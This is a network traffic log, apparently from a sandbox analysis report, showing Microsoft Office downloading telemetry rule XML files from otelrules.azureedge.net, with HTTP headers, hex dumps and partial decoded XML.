Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


Session IDSource IPSource PortDestination IPDestination Port
108192.168.2.44986313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:52 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:52 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:52 GMT
Content-Type: text/xml
Content-Length: 1354
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE0662D7C"
x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024652Z-16849878b78qg9mlz11wgn0wcc000000070000000000dd8z
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:52 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


Session IDSource IPSource PortDestination IPDestination Port
109192.168.2.44986413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:52 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:52 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:52 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDCDD6400"
x-ms-request-id: b03ac640-101e-007a-1bc8-27047e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024652Z-17c5cb586f6z6tw6g7cmdv30m800000008w000000000825v
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session IDSource IPSource PortDestination IPDestination Port
110192.168.2.44986513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:52 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:52 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:52 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDF1E2608"
x-ms-request-id: 7acc01d2-801e-00ac-78ea-28fd65000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024652Z-r197bdfb6b42rt68rzg9338g1g00000008tg000000002atd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:52 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


Session IDSource IPSource PortDestination IPDestination Port
111192.168.2.44986813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:53 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:53 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:53 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
ETag: "0x8DC582BDC2EEE03"
x-ms-request-id: 19ae2231-801e-007b-0d9c-27e7ab000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024653Z-16849878b78bjkl8dpep89pbgg000000064g00000000b90f
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:53 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session IDSource IPSource PortDestination IPDestination Port
112192.168.2.44986613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:53 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:53 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:53 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
ETag: "0x8DC582BE8C605FF"
x-ms-request-id: 43b0bec6-701e-0050-4289-286767000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024653Z-15b8d89586flzzksdx5d6q7g1000000002q00000000005a9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:53 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


Session IDSource IPSource PortDestination IPDestination Port
113192.168.2.44986713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:53 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:53 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:53 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF497570"
x-ms-request-id: 7b68ac53-d01e-0082-7e67-27e489000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024653Z-16849878b78z2wx67pvzz63kdg000000061g00000000ancd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:53 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
114192.168.2.44986913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:53 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:53 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:53 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
ETag: "0x8DC582BEA414B16"
x-ms-request-id: 68df6217-401e-0029-6d9c-279b43000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024653Z-15b8d89586fnsf5zkvx8tfb0zc00000002g000000000dma3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:53 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


Session IDSource IPSource PortDestination IPDestination Port
115192.168.2.44987013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:53 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:53 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:53 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
ETag: "0x8DC582BE1CC18CD"
x-ms-request-id: 54290c1c-d01e-008e-01bf-27387a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024653Z-16849878b78j5kdg3dndgqw0vg0000000960000000005r00
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:53 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


Session IDSource IPSource PortDestination IPDestination Port
116192.168.2.44987313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:53 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:53 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
ETag: "0x8DC582BE5B7B174"
x-ms-request-id: cf3e7330-401e-0078-5ca6-264d34000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024653Z-16849878b78fssff8btnns3b1400000007sg000000004ugw
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:54 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


Session IDSource IPSource PortDestination IPDestination Port
117192.168.2.44987213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:53 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:54 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB866CDB"
x-ms-request-id: fae51377-601e-0002-1366-2aa786000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024654Z-r197bdfb6b4xfp4mncra29rqkc00000000tg00000000ea6d
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:54 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session IDSource IPSource PortDestination IPDestination Port
118192.168.2.44987113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:53 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:54 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB256F43"
x-ms-request-id: a9c77195-601e-003e-7294-293248000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024654Z-15b8d89586ffsjj9qb0gmb1stn0000000bhg00000000euby
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:54 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
119192.168.2.44987413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:54 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:54 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
ETag: "0x8DC582BE976026E"
x-ms-request-id: 338a3e6d-c01e-0079-709c-27e51a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024654Z-16849878b78zqkvcwgr6h55x9n00000006u000000000k28t
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
